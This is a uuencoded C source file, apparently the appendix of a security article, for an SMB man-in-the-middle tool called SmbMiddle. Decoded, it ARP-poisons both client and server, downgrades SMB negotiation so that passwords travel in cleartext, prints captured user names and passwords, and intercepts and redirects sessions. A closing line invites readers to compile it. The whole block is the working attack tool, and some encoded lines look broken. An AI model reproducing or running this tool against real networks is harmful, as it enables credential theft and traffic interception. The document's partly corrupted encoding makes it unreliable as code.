M8FAA<[email protected]<#$V+"!S<#@L('`Q-"[email protected],2D[#0H)<VUB:&%S:"AP,38K."[email protected]<W`X
M+"!P,[email protected],2D[#0I]#0H-"G9O:[email protected]]0,C0H8V]N<[email protected]=6YS:[email protected]
M8VAA<B`J<#(Q+"`-"@D)8V]N<[email protected]=6YS:[email protected]<B`[email protected]('5N<VEG
M;F5D(&-H87(@*G`R-"D-"GL-"@ES;6)H87-H*'`R-"[email protected]@L('`R,[email protected],2D[
M#0H)<VUB:&%S:"AP,C0K."[email protected]@L('`R,2LW+"`Q*3L-"@ES;6)H87-H*'`R
M-"[email protected]@L('`R,2LQ-"[email protected],2D[#0I]#0H-"B\J*BHJ*BHJ*BHJ*BHJ*BHJ
M*BHJ*BHJ*B\-"B\O36]D:[email protected];VYS('1O(')[email protected]('=R
M:71E(`T*#0IV;VED(%)E860H#[email protected]("`@("`@("`@:6YT(%-O8VLL#[email protected]("`@
M("`@("`@=5]C:&%R("I086-K970I#0I[#[email protected])T4V5S<VEO;DAD<B!.8G13
M97-S:6]N.PT*#[email protected];65M<V5T*%!A8VME="PP+$E07TU!6%]325I%*3L-"@D-
M*3L-"B`@#[email protected];65M8W!Y*%!A8VME="PH=5]C:&%R("HI("@F3F)T4V5S<VEO
M("`@("`H=5]C:&%R("HI("[email protected]*R!S:7IE;V8H3F)T4V5S<VEO;DAD
M<BDI+`T*("`@("`@(&YT;VAS*$YB=%-E<W-I;VXN3&5N9W1H*2D[#0I]#[email protected]
M#0H-"B`-"G9O:[email protected])I=&4H#[email protected]("`@("`@("`@(&EN="!3;V-K+`T*("`@
M8G1397-S:6]N.PT*(`T*($YB=%-E<W-I;[email protected]/2`H3F)T4V5S<VEO;DAD<B`J
M"B`@("`@("!S:7IE;V8H3F)T4V5S<VEO;DAD<[email protected]*R`-"B`@("`@("!N=&]H
M*BHJ*BHJ*BHJ+PT*#0HO*E1O(&[email protected]=&AE($U!0R!A9&1R97-S(&]F('1H
M0E5&7U-)6D5=.PT*#[email protected];"`](&QI8FYE=%]I;FET*$Q)0DY%5%],24Y++$1E
M=FEC92Q%<G)"=68I.PT*#[email protected]`](&QI8FYE=%]G971?:'=A9&1R*&PI.PT*
M#[email protected];65M8W!Y*$5N970L92T^971H97)?861D<E]O8W1E="Q%5$A?04Q%3BD[
M9&EF>2!T:&[email protected];F5G<')O="!R97!L>2HO#0H-"G9O:[email protected]')O=%)E<&QY
M#0HO*E-T87)T<R!H97)E("$J+R`-"B`-"B!.8G1397-S:6]N(#[email protected]*$YB=%-E
M<W-I;VY(9'(@*[email protected]*%!A8VME="D[#0H-"B!3;6)"87-E(#[email protected]*%-M8D)A<V5(
M9'(@*[email protected]*%!A8VME="`K('-I>F5O9BA.8G1397-S:6]N2&1R*2D[#0H-"B!3
M;6).96=0<F]T4F5P;'[email protected]/2`H4VUB3F5G4')O=%)E<&QY2&1R("HI(`T*("`@
M("`@("`@("`@("`@("`@("[email protected]*PT*("`@("`@("`@("`@("`@("`@
M("!S:7IE;V8H3F)T4V5S<VEO;DAD<[email protected]*PT*("`@("`@("`@("`@("`@("`@
M(`T*("\J5&\@:&%V92!T:&[email protected]&]M86EN($YA;64J+PT*#[email protected]*E-E8W5R:71Y
M(#[email protected]*%-M8DYE9U!R;W1297!L>2T^4V5C=7)I='E-;V1E*2`F(#$[#0H-"B!I
M9BA396-U<FET>2D-"B![#[email protected]('!R:[email protected]&Y5<V5R(&QE=F5L(%-E8W5R
M:71Y7&XB*3L-"B!]#[email protected]*('L-"B`@<')I;G1F*")<;E-H87)E(&QE
M=F5L(%-E8W5R:71Y7&XB*3L-"B!]#0H-"B!$;VUA:6Y.86UE3&5N9W1H(#[email protected]
M0V]U;G1;,%TM#[email protected]("`@("`@("`@("`@("`@("`@($5.0U]+15E?3$5.1U1(
M.PT*#[email protected]&]M86EN3F%M92`]("AU7V-H87(@*[email protected]#[email protected]("`@("`@("`@("`@
M#0H-"B`O*D-O<'[email protected]=&AE($1O;6%I;B!N86UE(&EN(&[email protected]<W1R:6YG*B\-"@T*
M*2`K#[email protected]("`@("`@("!S:7IE;V8H4VUB0F%S94AD<[email protected]*PT*("`@("`@("`@
M<VEZ96]F*%-M8DYE9U!R;W1297!L>4AD<[email protected]*PT*("`@("`@("`@14Y#7TM%
M65],14Y'[email protected]+`T*("`@("`@("!$;VUA:6Y.86UE3&5N9W1H*3L-"B`@("`@
M("`@(`T*("\J5&\@:&%V92!T:&[email protected]<GEP=&EO;B!K97DJ+PT*#[email protected];65M
M8W!Y*$5N8W)Y<'1I;VY+97DL#[email protected]("`@("`@("AU7V-H87(@*[email protected]*%!A8VME
M="`K#[email protected]("`@("`@("`@("`@("`@("`@('-I>F5O9BA.8G1397-S:6]N2&1R
M*2`K#[email protected]("`@("`@("`@("`@("`@("`@('-I>F5O9BA3;6)"87-E2&1R*2`K
M#[email protected]("`@("`@("`@("`@("`@("`@('-I>F5O9BA3;6).96=0<F]T4F5P;'E(
M*E!A8VME="!M;V1I9FEC871I;VXJ+PT*#[email protected][email protected]=&AE(&1O;6%I;B!N
M"B!M96UC<'DH*'5?8VAA<B`J("[email protected]*%!A8VME="`K#[email protected]("`@("`@("`@("`@
M("`@("`@("!S:7IE;V8H3F)T4V5S<VEO;DAD<[email protected]*PT*("`@("`@("`@("`@
M("`@("`@("`@("`@($1O;6%I;DYA;64L#[email protected]("`@("`@("`@("`@("`@("`@
M94-O=6YT6S!=(#[email protected]&]M86EN3F%M94QE;F=T:#L-"@T*+RI4;R!M;[email protected]
M=&AE('-E8W5R:71Y(&UO9&[email protected]!A;[email protected]=&AE(&5N8W)Y<'1I;[email protected]:V5Y
M(&QE;F=T:"HO#[email protected]#[email protected]')O=%)E<&QY+3Y396-U<FET>4UO9&[email protected]
M;V8H4VUB0F%S94AD<[email protected]*PT*("`@("`@("`@("`@("`@("`@("`@("`@("`@
M("`@("`@("`@("`@("!$;VUA:6Y.86UE3&5N9W1H*3L-"@T*?0T*(`T*#[email protected]
M*BHJ*BHJ*BHJ*BHJ*BHJ*B\-"@T*+RI3;[email protected];6]D:69Y(&%N9"!S96YD
M('1H92!S971U<"!8(')E<75E<W0J+PT*#0H-"G9O:[email protected]=7!84F5Q=65S
M="@-"B`@("`@("`@("`@("`@("`@("`@=5]C:&%R("I086-K970L#[email protected]("`@
M9'(@*DYB=%-E<W-I;VX[#0H-"B!3;6)"87-E2&1R("I3;6)"87-E.PT*#[email protected]
M;W(@<&%C:V5T(&UO9&EF:6-A=&EO;BHO#[email protected]=5]C:&%R("I496UP.PT*('5?
M"B!I;[email protected]&5M<%-I>F4[#[email protected]=5]C:&%R(%!A<W-W;W)D6S$V73L-"@T*+RI3
M=&%R=',@:&5R92HO#0H-"B!.8G1397-S:6]N(#[email protected]*$YB=%-E<W-I;VY(9'(@
M*[email protected]*%!A8VME="D[("`-"@T*(%-M8D)A<[email protected]/2`H4VUB0F%S94AD<B`J*2`H
M8G1397-S:6]N2&1R*2D[#0H)"0T*(%-M8E-E='5P6%)E<75E<[email protected]/2`H4VUB
M2&1R*2D[#0H-"B!M96US970H4&%S<W=O<F0L,"PQ-BD[#[email protected]("`@("`@#[email protected]
M<W1R;F-P>2A087-S=V]R9"P-"B`@("`@("`@("AU7V-H87(@*[email protected]#[email protected]("`@
M<[email protected]*PT*("`@("`@("`@('-I>F5O9BA3;6)"87-E2&1R*2`K(`T*("`@("`@
M("`@('-I>F5O9BA3;6)3971U<%A297%U97-T2&1R*2DL#[email protected]("`@("`@("`@
M=&A;,%TI.PT*("`@("`@(`T*("\[email protected]=&AE<[email protected]:7,@82!S:&%R92!S96-U
M<FET>2!L979E;"[email protected][email protected]&]N)[email protected]<')I;[email protected]=&AE#[email protected]("[email protected]=7-E<B!N86UE
M*B\-"@[email protected]#[email protected]:68H4V5C=7)I='DI#[email protected]>PT*("!P<FEN=&8H(EQN57-E<B`Z
M("5S(BP-"B`@("`@("`@("AU7V-H87(@*[email protected]#[email protected]("`@("`@("`H4&%C:V5T
M("[email protected]#[email protected]("`@("`@("`@<VEZ96]F*$YB=%-E<W-I;VY(9'(I("L-"B`@("`@
M("`@("!S:7IE;V8H4VUB0F%S94AD<[email protected]*R`-"B`@("`@("`@("!S:7IE;V8H
M4VUB4V5T=7!84F5Q=65S=$AD<[email protected]*PT*("`@("`@("`@(%-M8E-E='5P6%)E
M<75E<W0M/D-A<V5);G-E;G-I=&EV95!A<W-W;W)D3&5N9W1H6S!=*2D[#[email protected]
M?2`@("`@(`T*("`@("`@("`@#[email protected]<')I;G1F*")<;E!A<W,@.B`E<UQN7&XB
M+%!A<W-W;W)D*3L-"@T*("\O(%=E('!U="!T:&[email protected]<GEP=&5D('!A<W-W
M;W)D(&EN<[email protected];[email protected]=&AE('!A<W-W;W)D#[email protected]+R\@*B!I;B!C;&5A<B!T
M<GEP=&5D4&%S<W=O<F0I.PT*("`@("`@#[email protected]&5M<%-I>[email protected]/2`H4VUB4V5T
M72D[#[email protected]("`@("`-"B!496UP(#[email protected];6%L;&]C*%1E;7!3:7IE*G-I>F5O9BAU
M7V-H87(I*3L-"@T*(&UE;6-P>[email protected]=5]C:&%R("HI*"!496UP*[email protected]#[email protected]("`@
M("`@("AU7V-H87(@*[email protected]#[email protected]("`@("`@("[email protected]*R`-"B`@("`@("`@
M('-I>F5O9BA.8G1397-S:6]N2&1R*2`K#[email protected]("`@("`@("!S:7IE;V8H4VUB
M0F%S94AD<[email protected]*R`-"B`@("`@("`@('-I>F5O9BA3;6)3971U<%A297%U97-T
M2&1R*2`K#[email protected]("`@("`@("!3;6)3971U<%A297%U97-T+3Y#87-E26YS96YS
M:71I=F5087-S=V]R9$QE;F=T:%LP72DL#[email protected]("`@("`@("!496UP4VEZ92D[
M#0H-"B!M96UC<'DH*'5?8VAA<B`J*2`H4&%C:V5T("[email protected]#[email protected]("`@("`@("`@
M("`@("`@("`@('-I>F5O9BA.8G1397-S:6]N2&1R*2`K#[email protected]("`@("`@("`@
M("`@("`@("`@('-I>F5O9BA3;6)"87-E2&1R*2`K#[email protected]("`@("`@("`@("`@
M("`@("`@('-I>F5O9BA3;6)3971U<%A297%U97-T2&1R*2DL#[email protected]("`@("`@
M14Y'[email protected]*#[email protected];65M8W!Y*"AU7V-H87(@*[email protected]*%!A8VME="`K(`T*("`@
M("`@("`@("`@("`@("`@("!S:7IE;V8H3F)T4V5S<VEO;DAD<[email protected]*PT*("`@
M("`@("`@("`@("`@("`@("!S:7IE;V8H4VUB0F%S94AD<[email protected]*PT*("`@("`@
M("`@("`@("`@("`@("!S:7IE;V8H4VUB4V5T=7!84F5Q=65S=$AD<[email protected]#[email protected]
M("`@("`@("`@("`@("`@("`@("[email protected]#7U!!4U-73U)$7TQ%3D=42"DL#[email protected]
M("`@("`@("AU7V-H87(@*[email protected]*%1E;7`I+`T*("`@("`@("`@5&5M<%-I>F4I
M.PT*("`@("`@#[email protected]=7!84F5Q=65S="T^0GET94-O=6YT6S!=(#[email protected]
M5&5M<%-I>[email protected]*R`-"B`@("`@("`@("`@("`@("`@("`@("`@("`@("`@("`@
M97%U97-T+3Y#87-E4V5N<VET:79E4&%S<W=O<F1,96YG=&A;,%[email protected]/2`P>#`P
M.PT*#[email protected]=7!84F5Q=65S="T^0V%S94EN<V5N<VET:79E4&%S<W=O
M<F1,96YG=&A;,%T]14Y#7U!!4U-73U)$7TQ%3D=42#L-"@D)("`@("`@#[email protected]
M3F)T4V5S<VEO;BT^3&5N9W1H(#[email protected]:'1O;G,H<VEZ96]F*%-M8D)A<V5(9'(I
M=7!84F5Q=65S=$AD<[email protected]*R`-"B`@("`@("`@("`@("`@("`@("`@("`@("`@
M("!496UP4VEZ92`K#[email protected]("`@("`@("`@("`@("`@("`@("`@("`@("`@14Y#
M*BHJ*BHJ*B\-"@T*+R].;W)[email protected]]N;F5X:6]N(&]N('!O<[email protected],3,Y#0H-
M"FEN="!.;W)M86PH:6YT(%-O8VM0<F]X>[email protected]:6YT(%-O8VM3;6)397)V97(I
M#0I[#[email protected]:6YT(%-E8W5R:71Y/3`[#0H-"B!I;[email protected]]U;G0[#0H-"B!U7V-H
M87(@16YC<GEP=&EO;DME>5M%3D-?2T597TQ%3D=42%T[#[email protected]#[email protected]=5]C:&%R
M*BHJ*BHJ*B\-"@T*(%)E860H4V]C:U!R;WAY+%!A8VME="D[#[email protected](`T*(%=R
M(%)%4$Q9*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ+PT*#[email protected]"A3;V-K4VUB4V5R
M"B\J*BHJ*BHJ*BHJ*DY%[email protected]"HJ*BHJ*BHJ*BHJ*B\-"@T*
M(%)E860H4V]C:U!R;WAY+%!A8VME="D[#[email protected](`T*#[email protected])I=&4H4V]C:U-M
M*3L-"@T*($YE9U!R;W1297!L>[email protected]"B`@("`@("`@("`@("`@4&%C:V5T+`T*
M4V5C=7)I='DI.PT*#[email protected])I=&4H4V]C:U!R;WAY+%!A8VME="D[#0H-"B\J
M=&EO;DME>2P-"B`@("`@("`@("`@("`@(%-E8W5R:71Y*3L-"B`@#[email protected])I
M55!8(%)%4$Q9*BHJ*BHJ*BHJ*BHJ*BHJ+PT*#[email protected]"A3;V-K4VUB4V5R
M=F5R+%!A8VME="D[#0H-"B!M96UC<'DH#[email protected]("`@("`@("AU7V-H87(@*[email protected]
M*"!N=&]H<RA.8G1397-S:6]N+DQE;F=T:"[email protected]/B`S-2`I#[email protected]>PT*("!P<FEN
M#0H-"B`@5W)I=&4H4V]C:U!R;WAY+%!A8VME="D[#[email protected](`T*+RHJ*BHJ*BHJ
M*BHJ5$-/[email protected]@24Y415)#15!424].*BHJ*BHJ*BHJ+PT*("`@#[email protected](%)E860H
M86-K970I.PT*#[email protected]('!R:[email protected]<[email protected]`E<UQN(BP-"B`@("`@("`@
M("AU7V-H87(@*[email protected]*%!A8VME="`K#[email protected]("`@("`@("`@("`@("`@("`@("!S
M:7IE;V8H3F)T4V5S<VEO;DAD<[email protected]*PT*("`@("`@("`@("`@("`@("`@("`@
M>F5O9BA3;6)48V]N6%)E<75E<W1(9'(I("[email protected],2`I*3L-"@T*+RHJ*BHJ*BHJ
M*BHJ4D5$25)%0U1)3TXJ*BHJ*BHJ*BHJ*BHJ*BHJ+PT*#[email protected]("\O1&\@>6]U
M('=A;[email protected]=&\@:&%V92!N;[email protected];F<@<F5A9"@I(&-A;&QS(#\-"@T*
M=&PH4V]C:U-M8E-E<G9E<BQ&7U-%5$9,+$]?3D].0DQ/0TLI.PT*#[email protected]('=H
M:6QE*#$I#[email protected]('L-"B`@($-O=6YT(#[email protected]<F5A9"A3;V-K4')O>'DL)DYB=%-E
M*0T*("`@>PT*("`@('!R:[email protected]&Y397-S:6]N(&9I;FES:&5D("%<;B(I
M.PT*("`@(&-L;W-E*%-O8VM0<F]X>2D[#[email protected]("`@8VQO<V4H4V]C:U-M8E-E
M<G9E<BD[#[email protected]("`@<F5T=7)N(#`[#[email protected]("!]#[email protected]("`-"B`@(&EF*$-O=6YT
M<B`J*2`H)DYB=%-E<W-I;VXI+'-I>F5O9BA.8G1397-S:6]N2&1R*2D[#[email protected]
M("`@("`@*'5?8VAA<B`J*2`H4&%C:V5T("[email protected]<VEZ96]F*$YB=%-E<W-I;VY(
M*[email protected]*%!A8VME="DL#[email protected]("`@("`@("`@;G1O:',H3F)T4V5S<VEO;BY,96YG
M?0T*#[email protected]("!#;W5N="`](')E860H4V]C:U-M8E-E<G9E<BPF3F)T4V5S<VEO
M;BQS:7IE;V8H3F)T4V5S<VEO;DAD<BDI.PT*#[email protected]("[email protected]]U;G0I#[email protected]
M("![#[email protected]("`@<')I;G1F*")<;E-E<W-I;[email protected]:[email protected](5QN(BD[#[email protected]
M*3L-"B`@("!R971U<[email protected],#L-"B`@('T-"B`@(`T*("`@:68H0V]U;[email protected]([email protected]
[email protected])[email protected]]U;G0I#[email protected]("![#[email protected]("`@;65M<V5T*%!A8VME="PP+$E07TU!
M6%]325I%*[email protected]#[email protected]("`-"B`@("!M96UC<'DH4&%C:V5T+"AU7V-H87(@*[email protected]
M("`@("`@("`@("`@("`-"B`@("!R96%D*%-O8VM3;6)397)V97(L#[email protected]("`@
M("`@("`H=5]C:&%R("HI("[email protected]*R!S:7IE;V8H3F)T4V5S<VEO;DAD
M#[email protected]("`@("`@("`@<VEZ96]F*$YB=%-E<W-I;VY(9'(I*3L-"B`@('T-"B`@
M?0T*('T-"B!E;'-E#[email protected]>PT*("!P<FEN=&8H(E-E<W-I;[email protected]%I;&5D("T^
M(%!A<W-W;W)D(&EN=F%L:[email protected](5QN(BD[#[email protected]("`-"B`@5W)I=&4H4V]C:U!R
M;WAY+%!A8VME="D[#[email protected]#[email protected](&-L;W-E*%-O8VM0<F]X>2D[#[email protected](&-L;W-E
M*%-O8VM3;6)397)V97(I.PT*("`-"B`@<F5T=7)N(#`[#[email protected]?0T*(`T*(&-L
M;W-E*%-O8VM0<F]X>2D[#[email protected]<V4H4V]C:U-M8E-E<G9E<BD[#[email protected]#[email protected]
M<R!T:&[email protected](DYO<FUA;"(@9G5N8W1I;VX-"B`J(&)U="!T:&[email protected];F)T(&YA;65S
M('-E;F1I;F<@<')O8V5S<R!I<R!N;[email protected]:6YC;'[email protected]*B\-"@T*:6YT(%=I
M*0T*>PT*(&EN="!396-U<FET>3TP.PT*#[email protected]:6YT($-O=6YT.PT*#[email protected]=5]C
M<B!086-K971;25!?34%87U-)6D5=.PT*#[email protected])T4V5S<VEO;DAD<B!.8G13
M97-S:6]N.PT*#[email protected]#0H-"B\J*BHJ*BHJ*BHJ*DY%[email protected]"HJ
M*BHJ*BHJ*BHJ*B\-"@T*(%)E860H4V]C:U!R;WAY+%!A8VME="D[#[email protected](`T*
M#[email protected])I=&4H4V]C:U-M8E-E<G9E<BQ086-K970I.PT*#0HO*BHJ*BHJ*BHJ
M;6)397)V97(L4&%C:V5T*3L-"@T*($YE9U!R;W1297!L>[email protected]"B`@("`@("`@
M("`@("`@("`@("`@("`F4V5C=7)I='DI.PT*#[email protected])I=&4H4V]C:U!R;WAY
M:71Y*3L-"B`@#[email protected])I=&4H4V]C:U-M8E-E<G9E<BQ086-K970I.PT*(`T*
M+RHJ*BHJ*BHJ*BHJ4T5455!8(%)%4$Q9*BHJ*BHJ*BHJ*BHJ*BHJ+PT*#[email protected]
M4F5A9"A3;V-K4VUB4V5R=F5R+%!A8VME="D[#0H-"B!M96UC<'DH#[email protected]("`@
M("`@("AU7V-H87(@*[email protected]*"9.8G1397-S:6]N*2P-"B`@("`@("`@*'5?8VAA
M*3L-"B`-"B`@(`T*(&EF*"!N=&]H<RA.8G1397-S:6]N+DQE;F=T:"[email protected]/B`S
M-2`I#[email protected]>PT*("!P<FEN=&8H(D%C8V5S<R!G<F%N=&5D("T^(%!A<W-W;W)D
M#[email protected](`T*+RHJ*BHJ*BHJ*BHJ5$-/[email protected]@24Y415)#15!424].*BHJ*BHJ*BHJ
M+PT*("`@#[email protected](%)E860H4V]C:U!R;WAY+%!A8VME="D[#0H-"B`@5W)I=&4H
M4V]C:U-M8E-E<G9E<BQ086-K970I.PT*#[email protected]('!R:[email protected]<[email protected]`E
M<UQN(BP-"B`@("`@("`@("AU7V-H87(@*[email protected]*%!A8VME="`K#[email protected]("`@("`@
M("`@("`@("`@("`@("!S:7IE;V8H3F)T4V5S<VEO;DAD<[email protected]*PT*("`@("`@
M("`@("`@("`@("`@('-I>F5O9BA3;6)48V]N6%)E<75E<W1(9'(I("[email protected],2`I
M+PT*#[email protected]("\O1&\@>6]U('=A;[email protected]=&\@:&%V92!N;[email protected];F<@<F5A
M0DQ/0TLI.PT*#[email protected]('=H:6QE*#$I#[email protected]('L-"B`@($-O=6YT(#[email protected]<F5A9"A3
M"B`@(`T*("`@:68H(4-O=6YT*0T*("`@>PT*("`@('!R:[email protected]&Y397-S
M:6]N(&9I;FES:&5D("%<;B(I.PT*("`@(&-L;W-E*%-O8VM0<F]X>2D[#[email protected]
M("`@8VQO<V4H4V]C:U-M8E-E<G9E<BD[#[email protected]("`@<F5T=7)N(#`[#[email protected]("!]
M97-S:6]N2&1R*2D[#[email protected]("`@("`@("`@("`@("`@("`@(`T*("`@(')E860H
M4V]C:U!R;WAY+`T*("`@("`@("`@*'5?8VAA<B`J*2`H4&%C:V5T("[email protected]<VEZ
M("`@("`@("AU7V-H87(@*[email protected]*%!A8VME="DL#[email protected]("`@("`@("`@;G1O:',H
M<VEO;DAD<BDI.PT*("`@?0T*#[email protected]("!#;W5N="`](')E860H4V]C:U-M8E-E
M#[email protected]("[email protected]]U;G0I#[email protected]("![#[email protected]("`@<')I;G1F*")<;E-E<W-I;[email protected]
M9FEN:[email protected](5QN(BD[#[email protected]("`@8VQO<V4H4V]C:U!R;WAY*3L-"B`@("!C
M;&]S92A3;V-K4VUB4V5R=F5R*3L-"B`@("!R971U<[email protected],#L-"B`@('T-"B`@
M(`T*("`@:68H0V]U;[email protected]([email protected][email protected])[email protected]]U;G0I#[email protected]("![#[email protected]("`@;65M
M<V5T*%!A8VME="PP+$E07TU!6%]325I%*[email protected]#[email protected]("`-"B`@("!M96UC<'DH
M4&%C:V5T+"AU7V-H87(@*[email protected]*"9.8G1397-S:6]N*2QS:7IE;V8H3F)T4V5S
M8VM3;6)397)V97(L#[email protected]("`@("`@("`H=5]C:&%R("HI("[email protected]*R!S
M=%-E<W-I;VXN3&5N9W1H*2`K#[email protected]("`@("`@("`@<VEZ96]F*$YB=%-E<W-I
M;VY(9'(I*3L-"B`@('T-"B`@?0T*('T-"B!E;'-E#[email protected]>PT*("!P<FEN=&8H
M(E-E<W-I;[email protected]%I;&5D("T^(%!A<W-W;W)D(&EN=F%L:[email protected](5QN(BD[#[email protected]
M("`-"B`@5W)I=&4H4V]C:U!R;WAY+%!A8VME="D[#[email protected]#[email protected](&-L;W-E*%-O
M8VM0<F]X>2D[#[email protected](&-L;W-E*%-O8VM3;6)397)V97(I.PT*("`-"B`@<F5T
M=7)N(#`[#[email protected]?0T*(`T*(&-L;W-E*%-O8VM0<F]X>2D[#[email protected]<V4H4V]C
M:U-M8E-E<G9E<BD[#[email protected]#[email protected]<F5T=7)N(#`[#0I](`T*("`-"@T*#0H-"B\J
M*BHJ*BHJ*@T*("`@("`@("`@("`@("`@("`@("`@("`@("`@5$A%([email protected]
M(&-H87(@*F]P=&%R9SL-"F5X=&5R;B!I;[email protected];W!T:6YD.PT*97AT97)N(&EN
M"GL-"B!S=&%T:6,@8VAA<B!O<'1S=')I;F=;73TB:3IS.F,Z9CIL.B([#[email protected]
M:6YT(&]P=&-H.PT*(&EN="!,:7-T96Y0;W)T(#[email protected],3$S.3L-"B!C:&%R("I$
M979I8V4[#0H-"B!S=')[email protected]<V]C:V%D9')?:[email protected]=F5R.PT*('-T
M<G5C="!S;V-K861D<E]I;B!0<F]X>3L-"B`-"B!I;[email protected]]C:U-M8E-E<G9E
M<CL-"B!I;[email protected]]C:U!R;WAY.PT*#[email protected]:6YT($-O=6YT.PT*#[email protected]<B!#
M:&]I8V4],#L-"@T*+RI3979E<F%L($E0(&%D9')E<W-E<RHO#[email protected]=5]I;G0S
M,E]T($UY27`[#[email protected]#[email protected]<&-A<%]T("I$97-C<CL-"B`-"B!U7V-H87(@4F5A
M<G9E<EM%5$A?04Q%3ET[#[email protected]=5]C:&%R($UY16YE=%M%5$A?04Q%3ET[#[email protected]
M#[email protected]<B!%<G)B=69;-#`Y-ET[#0H-"B!I9BAA<F=C(#[email protected],3$I#[email protected]>PT*
M("`@("`@("UF($9A:[email protected]!<;B(I.PT*("`-"B`@<F5T=7)N(#`[#[email protected]?0T*
M(`T*('=H:6QE*"AO<'1C:#[email protected];W!T*&%R9V,L87)G=BQO<'1S=')I;F<I
M*2$]14]&*0T*('L-"B`@<W=I=&-H*&]P=&-H*0T*("![#[email protected]("!C87-E("=I
M)SH-"B`@("[email protected]/2`H8VAA<B`J*2`H;6%L;&]C*'-T<FQE;BAO<'1A
M9RQS=')L96XH;W!T87)G*2D[#[email protected]("`@8G)E86L[#0H-"B`@(&-A<[email protected])V,G
[email protected]*("`@(&EN971?871O;BAO<'1A<F<L)E!R;WAY+G-I;E]A9&1R*3L-"B`@
M("!B<F5A:SL-"@T*("`@8V%S92`G<R<Z#[email protected]("`@:6YE=%]A=&]N*&]P=&%R
M92`G9B<Z#[email protected]("`@37E)<"`](&EN971?861D<BAO<'1A<F<I.PT*("`@(&)R
M96%K.PT*("`@#[email protected]("!C87-E("=L)SH-"B`@("!,:7-T96Y0;W)T(#[email protected]
M:2AO<'1A<F<I.PT*("`@(&)R96%K.PT*("`@#[email protected]("!D969A=6QT(#H-"B`@
M("!P<FEN=&8H(EQN4VUB36ED9&QE(`T*("`@("`@("`@("`@[email protected]:6YT97)F
M86-E(`T*("`@("`@("`@("`@+6,@0VQI96YT)W,@25`@#[email protected]("`@("`@("`@
M;W)T#[email protected]("`@("`@("`@("`M9B!&86ME($EP7&XB*3L-"B`@("!R971U<[email protected]
M,#L-"B`@('T-"B`@?0T*#[email protected]&5S8W(@/2!P8V%P7V]P96Y?;&EV92A$979I
M('EO=2!W86YT(%=I;C)K+UA0('-U<'!O<[email protected]*$Y"5"!D:7-A8FQE9"`A*2`Z
M('DO;C]<;B(I.PT*("!#:&][email protected]/2!G971C:&%R*"D[#[email protected](&=E=&-H87(H
M(&[email protected]=&AE($U!0R!A9')E<W,@;[email protected]=&AE(&-L:65N="HO#[email protected]#[email protected])P
M4F5Q=65S=$EN:F5C=&EO;[email protected])<"P-"B`@("`@("`@("`@("`@("`@("`@
M("90<F]X>2YS:6Y?861D<BYS7V%D9'(L#[email protected]("`@("`@("`@("`@("`@("`@
M("!->45N970L#[email protected]("`@("`@("`@("`@("`@("`@("!296%L16YE=$-L:65N
M27`L#[email protected]("`@("`@("`@("`@("93;6)397)V97(N<VEN7V%D9'(N<U]A9&1R
M+`T*("`@("`@("`@("`@("!->45N970L#[email protected]("`@("`@("`@("`@(%)E86Q%
M;F5T4VUB4V5R=F5R+`T*("`@("`@("`@("`@("!$979I8V4L#[email protected]("`@("`@
M("`@("`@($1E<V-R*3L-"@T*+RI!<G`@<&]I<V]N:6YG(&%G86EN<[email protected]=&AE
M('-E<G9E<BHO#[email protected]#[email protected])P4&]I<V]N*`T*("`@("`@("`@("`F4')O>'DN
M<G`@<&]I<V]N:6YG(&%G86EN<[email protected]=&AE(&-L:65N="HO#0H-"B!!<G!0;VES
M;VXH#[email protected]("`@("`@("`@("93;6)397)V97(N<VEN7V%D9'(N<U]A9&1R+`T*
M("!->45N970L#[email protected]("`@("`@("`@(%)E86Q%;F5T0VQI96YT+`T*("`@("`@
M('-W:71C:"A#:&]I8V4I#[email protected]>PT*("!C87-E("=Y)R`Z#[email protected](%-M8E-E<G9E
M#[email protected](`T*("!C87-E("=N)R`Z#[email protected](%-M8E-E<G9E<BYS:6Y?<&]R="`](&AT
M;VYS*%--0E]03U)4*3L-"B`@8G)E86L[#0H-"B`@9&5F875L="`Z#[email protected]('!R
M:[email protected]&Y0;&5A<[email protected]=V5R(&)Y('[email protected];W(@;B!F;W(@=&AE('=I;C)K
M+UA0('-U<'!O<G1<;B(I.PT*("!R971U<[email protected],#[email protected]#[email protected]?0T*(`T*(%-M8E-E
M<G9E<BYS:6Y?9F%M:6QY(#[email protected]?24Y%5#L-"B!3;V-K4VUB4V5R=F5R(#[email protected]
M9F%M:6QY(#[email protected]?24Y%5#L-"B!0<F]X>2YS:6Y?<&]R="`](&AT;VYS*$QI
M1$127T%.62D[#[email protected]#[email protected]]C:U!R;WAY(#[email protected]<V]C:V5T*$%&7TE.150L4T]#
M2U]35%)%04TL-BD[#[email protected]#0HO*E-T87)T('1O(&QI<W1E;B!F;W(@:6YC;VUI
M;F<@8V]N;FYE>&EO;BHO#[email protected]#[email protected]"@-"B`@("`@(%-O8VM0<F]X>2P-
M"B`@("`@("AS=')[email protected]<V]C:V%D9'(@*[email protected]*"90<F]X>2DL#[email protected]("`@("!S
M;BA3;V-K4')O>'DL,2D[#0H-"B!#;W5N="`]('-I>F5O9BAS=')[email protected]<V]C
M:V%D9')?:6XI.PT*#[email protected]]C:U!R;WAY(#[email protected]!T*`T*("`@("`@("`@
M("`@("`@("`@("!3;V-K4')O>'DL#[email protected]("`@("`@("`@("`@("`@("`@("AS
M=')[email protected]<V]C:V%D9'(@*[email protected]*"90<F]X>2DL#[email protected]("`@("`@("`@("`@("`@
M("`@("AI;[email protected]*[email protected]*"9#;W5N="D-"B`@("`@("`@("`@("`@("`@("`I.PT*
M#[email protected]]N;F5C="@-"B`@("`@("`@(%-O8VM3;6)397)V97(L#[email protected]("`@("`@
M('-I>F5O9BAS=')[email protected]<V]C:V%D9')?:6XI#[email protected]("`@("`@("D[#[email protected]#0HO
M#[email protected]>[email protected]#[email protected]("\J8V]N;F5X:6]N(&]N('!O<[email protected]#0U*B\-"B`-"B`@5VEN
M;'-E#[email protected]>PT*("`O*DYO<FUA;"!C;VYN97AI;[email protected];[email protected]<&]R="`Q,SDJ+PT*
M*BHO#0H-"BTM6R`@07!P96YD:[email protected]@0B`-"@T*66]U(&[email protected]:[email protected]=&AI<R!P
M87)T('1H92!S;[email protected];[email protected]=&AE('!R;[email protected]=7-E('1O('[email protected]"
M('-H87)E<RX-"@T*4F5A9"!T:&[email protected]<V]U<F-E+B!9;[email protected]=VEL;"!F:6YD(&[email protected]
M;&]T(&[email protected]:6YT97)E<W1I;F<@=&AI;F=S(&%B;W5T(%--0BX-"@T*[email protected]>6]U
M('=A;[email protected]=&\@8V]M<&EL92!I="[email protected]=&AE(&-O;6UA;[email protected]:7,@(F=C8R!S8V%N
